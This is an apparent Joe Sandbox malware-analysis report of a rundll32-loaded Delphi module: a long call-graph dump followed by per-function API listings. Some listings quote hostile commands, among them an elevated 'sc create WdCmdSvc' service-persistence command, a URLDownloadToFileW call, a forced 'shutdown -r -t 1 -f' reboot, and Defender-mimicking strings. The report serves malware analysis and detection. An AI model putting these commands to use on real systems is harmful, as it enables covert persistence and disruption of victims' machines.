4637d1f 13631 4637d40 CompareStringW 13630->13631 13632 4637d61 13631->13632 13636 463f034 13633->13636 13639 463efa4 13636->13639 13638 4637c66 13638->13630 13640 463efc5 13639->13640 13641 463ed58 MultiByteToWideChar 13640->13641 13642 463efeb 13640->13642 13641->13642 13642->13638 13643 484e11c 13644 484e132 13643->13644 13652 4817f48 13644->13652 13646 484e14b 13647 4817f48 10 API calls 13646->13647 13648 484e15e 13647->13648 13658 48180a4 13648->13658 13650 484e165 13671 4817e18 13650->13671 13653 4817f62 13652->13653 13654 4818063 13653->13654 13655 4818045 13653->13655 13656 481801d GetWindowLongW SetWindowLongW 13653->13656 13654->13646 13675 480acf4 GetWindowLongW 13655->13675 13656->13655 13660 48180d0 13658->13660 13659 481819d 13659->13650 13660->13659 13661 48180eb 13660->13661 13686 480f758 13660->13686 13663 4818134 13661->13663 13665 4818155 13661->13665 13670 4818153 13661->13670 13690 4817494 13663->13690 13664 4817e30 129 API calls 13664->13670 13715 480dc28 13665->13715 13670->13659 13670->13664 13672 4817e1e 13671->13672 13673 4817d04 129 API calls 13672->13673 13674 4817e2b 13672->13674 13673->13672 13674->13650 13676 480ad0d 13675->13676 13677 480ad2f IsIconic IsWindowVisible 13676->13677 13678 480adb0 13676->13678 13679 480ad62 13677->13679 13680 480ad5a ShowWindow 13677->13680 13678->13654 13681 480ad66 SetWindowLongW 13679->13681 13682 480ad77 SetWindowLongW 13679->13682 13680->13679 13683 480ad86 13681->13683 13682->13683 13683->13678 13684 480ada8 ShowWindow 13683->13684 13685 480ad9e ShowWindow 13683->13685 13684->13678 13685->13678 13687 480f793 13686->13687 13688 480f766 13686->13688 13687->13661 13688->13687 13689 480f78d ShowWindow 13688->13689 13689->13687 13719 480ac70 13690->13719 13692 48174a3 13693 48174fe 13692->13693 13722 48166f8 13692->13722 13693->13670 13712 4812f5c 13693->13712 13695 48174b2 13696 48174c7 13695->13696 13697 48174bb SetActiveWindow 13695->13697 13725 4816954 13696->13725 13697->13696 13699 48174d4 13700 481750f 13699->13700 13703 48174dd 13699->13703 13701 4818f78 2 API calls 13700->13701 13706 481751c 13701->13706 13702 481758f 13743 4815b28 13702->13743 13703->13693 13740 4818f78 IsWindowEnabled 13703->13740 13706->13702 13708 4817539 IsWindowEnabled 13706->13708 13708->13702 13710 4817543 13708->13710 13709 480f758 ShowWindow 13709->13693 13711 4817568 SetWindowPos DefWindowProcW 13710->13711 13711->13693 13713 480dc28 78 API calls 13712->13713 13714 4812f68 13713->13714 13714->13670 13716 480dc4e 13715->13716 13718 480dc38 13715->13718 13716->13718 13778 480f798 13716->13778 13718->13670 13720 480ac8b IsIconic 13719->13720 13721 480ac7e 13719->13721 13720->13692 13721->13692 13751 48165f8 13722->13751 13726 4816970 13725->13726 13727 4816a0e 13725->13727 13728 4816a19 13726->13728 13729 4816978 13726->13729 13727->13699 13728->13727 13731 4816a83 13728->13731 13735 4816a6c ShowWindow 13728->13735 13729->13727 13730 481698c EnumWindows 13729->13730 13732 481699d 13730->13732 13734 48169df 13730->13734 13764 4816848 GetWindow 13730->13764 13731->13727 13733 46de084 72 API calls 13731->13733 13732->13734 13738 48169c8 ShowWindow 13732->13738 13736 4816aa6 ShowOwnedPopups 13733->13736 13734->13727 13737 46de084 72 API calls 13734->13737 13735->13731 13735->13735 13736->13727 13736->13731 13739 4816a02 ShowOwnedPopups 13737->13739 13738->13734 13738->13738 13739->13727 13739->13734 13741 48174f4 13740->13741 13742 4818f98 EnableWindow 13740->13742 13741->13709 13742->13741 13774 4815acc SystemParametersInfoW 13743->13774 13746 4815b41 ShowWindow 13748 4815b53 13746->13748 13749 4815b4c 13746->13749 13748->13693 13777 4815afc SystemParametersInfoW 13749->13777 13752 4816694 13751->13752 13753 481660d 13751->13753 13752->13695 13753->13752 13754 4816616 EnumWindows 13753->13754 13754->13752 13755 4816636 GetWindow GetWindowLongW 13754->13755 13759 4816534 13754->13759 13756 4816653 13755->13756 13756->13752 13757 46de084 72 API calls 13756->13757 13758 4816688 SetWindowPos 13757->13758 13758->13752 13758->13756 13761 481654e 13759->13761 13760 481657e GetWindow 13762 481658a GetWindowLongW 13760->13762 13763 4816596 13760->13763 13761->13760 13761->13763 13762->13763 13765 4816865 13764->13765 13766 481687e 13764->13766 13765->13766 13768 4816872 GetWindowThreadProcessId 13765->13768 13767 4816883 GetCurrentProcessId 13766->13767 13769 481688d 13767->13769 13768->13767 13770 48168dc IsWindowVisible 13769->13770 13773 481691c 13769->13773 13771 48168e6 13770->13771 13770->13773 13772 463c0c0 26 API calls 13771->13772 13772->13773 13775 4815aeb 13774->13775 13775->13746 13776 4815afc SystemParametersInfoW 13775->13776 13776->13746 13777->13748 13779 480f7b0 13778->13779 13780 480fb3a 13778->13780 13779->13780 13781 480f7c9 13779->13781 13782 480f7de 13779->13782 13780->13718 13800 480ef8c 13781->13800 13784 480f80a 13782->13784 13786 480f7f5 13782->13786 13785 480f7d6 13784->13785 13817 4815d24 13784->13817 13789 480ef8c 75 API calls 13785->13789 13787 480ef8c 75 API calls 13786->13787 13787->13785 13790 480f825 13789->13790 13824 4814928 13790->13824 13792 4814928 GetSystemMetrics 13797 480f836 13792->13797 13793 4814914 72 API calls 13793->13797 13794 4814448 GetMonitorInfoW 13794->13797 13795 48143cc GetMonitorInfoW 13795->13797 13796 48143b4 GetMonitorInfoW 13796->13797 13797->13780 13797->13792 13797->13793 13797->13794 13797->13795 13797->13796 13798 4814400 GetMonitorInfoW 13797->13798 13799 48143e8 GetMonitorInfoW 13797->13799 13798->13797 13799->13797 13827 476eb9c 13800->13827 13802 480ef9d MonitorFromWindow 13803 4814928 GetSystemMetrics 13802->13803 13809 480efaf 13803->13809 13804 480efde 13832 4815cb4 13804->13832 13806 480efe8 13808 4814928 GetSystemMetrics 13806->13808 13814 480eff2 13808->13814 13809->13804 13810 480efca 13809->13810 13829 4814914 13809->13829 13811 4814914 72 API calls 13810->13811 13812 480efd6 13811->13812 13812->13785 13813 4814914 72 API calls 13813->13814 13814->13812 13814->13813 13815 480f00d 13814->13815 13816 4814914 72 API calls 13815->13816 13816->13812 13839 4815cd4 13817->13839 13819 4815d44 13819->13785 13821 4815cb4 73 API calls 13822 4815d3e 13821->13822 13823 4815cd4 74 API calls 13822->13823 13823->13819 13825 4814932 GetSystemMetrics 13824->13825 13826 481493a 13824->13826 13825->13797 13826->13797 13828 476eba6 13827->13828 13828->13802 13830 46de084 72 API calls 13829->13830 13831 4814924 13830->13831 13831->13809 13835 4815c7c 13832->13835 13836 4815c8c 13835->13836 13838 4815ca2 EnumDisplayMonitors 13835->13838 13837 46de084 72 API calls 13836->13837 13836->13838 13837->13836 13838->13806 13840 4814928 GetSystemMetrics 13839->13840 13843 4815ce7 13840->13843 13841 4815d14 13841->13819 13841->13821 13842 4814914 72 API calls 13842->13843 13843->13841 13843->13842 13845 4815d07 13843->13845 13847 4814474 GetMonitorInfoW 13843->13847 13846 4814914 72 API calls 13845->13846 13846->13841 13847->13843 13848 463c498 13849 463c4c4 13848->13849 13850 463c4a8 GetModuleFileNameW 13848->13850 13851 463d70c 44 API calls 13850->13851 13851->13849 13852 4857778 13855 46407f8 13852->13855 13854 4857788 13857 4640803 13855->13857 13859 4639778 13857->13859 13860 4639787 13859->13860 13861 463978c GetCurrentThreadId 13859->13861 13860->13861 13862 46397c2 13861->13862 13863 4639835 13862->13863 13864 4639ac4 13862->13864 13878 463970c 13863->13878 13865 4639af1 13864->13865 13866 4639ae0 13864->13866 13869 4639afa GetCurrentThreadId 13865->13869 13872 4639b07 13865->13872 13882 4639a2c 13866->13882 13869->13872 13871 4639aea 13871->13865 13873 4636f34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 13872->13873 13874 4639b97 FreeLibrary 13872->13874 13875 4639bbf 13872->13875 13873->13872 13874->13872 13876 4639bc8 13875->13876 13877 4639bce ExitProcess 13875->13877 13876->13877 13879 4639754 13878->13879 13880 463971c 13878->13880 13879->13854 13880->13879 13888 463f134 GetSystemInfo 13880->13888 13884 4639a93 13882->13884 13885 4639a36 GetStdHandle WriteFile 13882->13885 13884->13871 13889 463a5a8 13885->13889 13887 4639a83 GetStdHandle WriteFile 13887->13871 13888->13880 13890 463a5ae 13889->13890 13890->13887

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 0484A0CC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: ExecuteShell
                                                                              • String ID: " start= auto$/C sc create WdCmdSvc binPath= "$cmd.exe$runas
                                                                              • API String ID: 587946157-3037528773
                                                                              • Opcode ID: d800eeb9f42e4b3e1a98e7d517fa421749e6c11dacd6e0370235a44fa165b609
                                                                              • Instruction ID: 2aadecfa1b6e9954e62f3c777fe406829269aa9f027ec90bc07ce0f2ca7aa6ea
                                                                              • Opcode Fuzzy Hash: d800eeb9f42e4b3e1a98e7d517fa421749e6c11dacd6e0370235a44fa165b609
                                                                              • Instruction Fuzzy Hash: 2EF0C87068430CBFF705EBD0DC82F5DB7A8EB84714F900579B404E6B80E6B87A019919
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • Sleep.KERNEL32(0000012C,00000000,0484AD29), ref: 0484ACB2
                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 0484ACCF
                                                                              • Sleep.KERNEL32(0000012C,0000012C,00000000,0484AD29), ref: 0484AD09
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep$DownloadFile
                                                                              • String ID:
                                                                              • API String ID: 2087964873-0
                                                                              • Opcode ID: a3c427e3c08d59c30445fda9494c10347fb94235f5fd75060dee6351953899c7
                                                                              • Instruction ID: d36866dfb34fb514ac69fb333de578acb2a873e350481c8e20ca1058dbe0deae
                                                                              • Opcode Fuzzy Hash: a3c427e3c08d59c30445fda9494c10347fb94235f5fd75060dee6351953899c7
                                                                              • Instruction Fuzzy Hash: 18113374A40688AFE740EBA8DC81A8D77B4EF49705F5045A8E510E73A0EB747E10DF59
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0463D5DC,?,?), ref: 0463D54E
                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0463D5DC,?,?), ref: 0463D557
                                                                                • Part of subcall function 0463D3E4: FindFirstFileW.KERNEL32(00000000,?,00000000,0463D442,?,00000001), ref: 0463D417
                                                                                • Part of subcall function 0463D3E4: FindClose.KERNEL32(00000000,00000000,?,00000000,0463D442,?,00000001), ref: 0463D427
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                              • String ID:
                                                                              • API String ID: 3216391948-0
                                                                              • Opcode ID: 0e0c1a5d3d4cef2ab8e4fab5eb7faa2f72cb6438788a02cfd7499fdd986623d6
                                                                              • Instruction ID: c36bd90c309978810db77ec4d9684fa9ab23698a7a4e07b4de64867d95b9289f
                                                                              • Opcode Fuzzy Hash: 0e0c1a5d3d4cef2ab8e4fab5eb7faa2f72cb6438788a02cfd7499fdd986623d6
                                                                              • Instruction Fuzzy Hash: 7B119A70A041499FEB00FFE4C8919AEB3B5EF48309F504479E505E3391FB70BE048A69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,0463D442,?,00000001), ref: 0463D417
                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,0463D442,?,00000001), ref: 0463D427
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: 1c32f35824aa8aad741e3a73cb0b7dbb023e11ce79655f5d64cfe34fc109d9c2
                                                                              • Instruction ID: 7897837af16ede1ef014c498f14a4c143f1f3b356999b27364518aed24dcdc4e
                                                                              • Opcode Fuzzy Hash: 1c32f35824aa8aad741e3a73cb0b7dbb023e11ce79655f5d64cfe34fc109d9c2
                                                                              • Instruction Fuzzy Hash: 43F0BE71504684AFDB10EBB4CC9288EB3ACEB48216BA044B5A400E3291FB35BF04A918
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0463D22D,?,?), ref: 0463D041
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0463D22D,?,?), ref: 0463D08A
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0463D22D,?,?), ref: 0463D0AC
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0463D0CA
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0463D0E8
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0463D106
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0463D124
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0463D210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0463D22D), ref: 0463D164
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0463D210,?,80000001), ref: 0463D18F
                                                                              • RegCloseKey.ADVAPI32(?,0463D217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0463D210,?,80000001,Software\Embarcadero\Locales), ref: 0463D20A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Open$QueryValue$CloseFileModuleName
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                              • API String ID: 2701450724-3496071916
                                                                              • Opcode ID: 63f046f7a009c8ab0b0bbb8e2c9942372926870f75b58e2c546eef587e6e0fb5
                                                                              • Instruction ID: f1c4b2b933fb988d1f64a58666d95869928a781c50f45a8b43b81299f507f224
                                                                              • Opcode Fuzzy Hash: 63f046f7a009c8ab0b0bbb8e2c9942372926870f75b58e2c546eef587e6e0fb5
                                                                              • Instruction Fuzzy Hash: 7351F175B80288BFFB10DAA4CC46FAE73BCEB08706F504465BA05E7181F6B5FA449A54
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                                • Part of subcall function 0465D814: GetEnvironmentVariableW.KERNEL32(00000000,?,00000400,?,?,?,?,048496E1,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0), ref: 0465D83D
                                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 04849710
                                                                              • Sleep.KERNEL32(0000001E,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0,?,0484AD04,0000012C,00000000,0484AD29), ref: 04849717
                                                                                • Part of subcall function 0484A074: ShellExecuteW.SHELL32(00000000,runas,cmd.exe,00000000," start= auto,?), ref: 0484A0CC
                                                                                • Part of subcall function 0484991C: Sleep.KERNEL32(00002328,00000000,0484995B,?,?,04849759,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?,00000000), ref: 04849932
                                                                                • Part of subcall function 0484991C: WinExec.KERNEL32(C:\WINDOWS\system32\shutdown.exe -r -t 1 -f,00000000), ref: 0484993E
                                                                                • Part of subcall function 0484991C: Sleep.KERNEL32(0000012C,00002328,00000000,0484995B,?,?,04849759,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?), ref: 04849948
                                                                              • Sleep.KERNEL32(0000012C,.exe,0484AD29,0000012C,0000001E,0484976E,00000000,04849796,?,?,00000000,00000000,0484ADE0,?,0484AD04,0000012C), ref: 0484975E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep$EnvironmentExecExecuteFileMoveShellVariable
                                                                              • String ID: .exe$MpCmdRun$Nigeria Coaches$\Microsoft\Crypto\Keys\bin01.zip$appdata$bin01.zip$false1$false2$false3
                                                                              • API String ID: 4165743239-145433689
                                                                              • Opcode ID: eaa59d281b638117c841c586c0724d92a181e4c56a535315a56749b414f3d88f
                                                                              • Instruction ID: 9034bc1e119a41e195d559392d7afa72cd7f60df145029e96b46e287939af6b7
                                                                              • Opcode Fuzzy Hash: eaa59d281b638117c841c586c0724d92a181e4c56a535315a56749b414f3d88f
                                                                              • Instruction Fuzzy Hash: 63514E70A101489FEB10FFA8D88099EB3B5FF89309F504A64E541A7364EB34BE05EB95
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF,?,?,00000000,00000000,00000000), ref: 0463CCF2
                                                                              • LeaveCriticalSection.KERNEL32(04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF,?,?,00000000,00000000), ref: 0463CD16
                                                                              • LeaveCriticalSection.KERNEL32(04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF,?,?,00000000,00000000), ref: 0463CD25
                                                                              • IsValidLocale.KERNEL32(00000000,00000002,04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF), ref: 0463CD37
                                                                              • EnterCriticalSection.KERNEL32(04863C14,00000000,00000002,04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF), ref: 0463CD94
                                                                              • LeaveCriticalSection.KERNEL32(04863C14,04863C14,00000000,00000002,04863C14,04863C14,00000000,0463CDD8,?,?,?,00000000,?,0463D6A0,00000000,0463D6FF), ref: 0463CDBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000B.00000002.3506078201.0000000004631000.00000020.00000001.01000000.00000010.sdmp, Offset: 04630000, based on PE: true
                                                                              • Associated: 0000000B.00000002.3506041644.0000000004630000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                              • String ID: en-GB,en,en-US,
                                                                              • API String ID: 975949045-3021119265
                                                                              • Opcode ID: 3a8e76b9aa7a967194c172c1b847ed58d8e1aabdbdf876a4893f1ebb3c71f59d
                                                                              • Instruction ID: 026f86523bf882bd8635658effe39fda10881ba68e9a8dd3859fe4865450344d
                                                                              • Opcode Fuzzy Hash: 3a8e76b9aa7a967194c172c1b847ed58d8e1aabdbdf876a4893f1ebb3c71f59d
                                                                              • Instruction Fuzzy Hash: E721C0227002D06BFB11BBB88C516297594DF4470FF50492AF402FB340FAA9BC50EAAA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
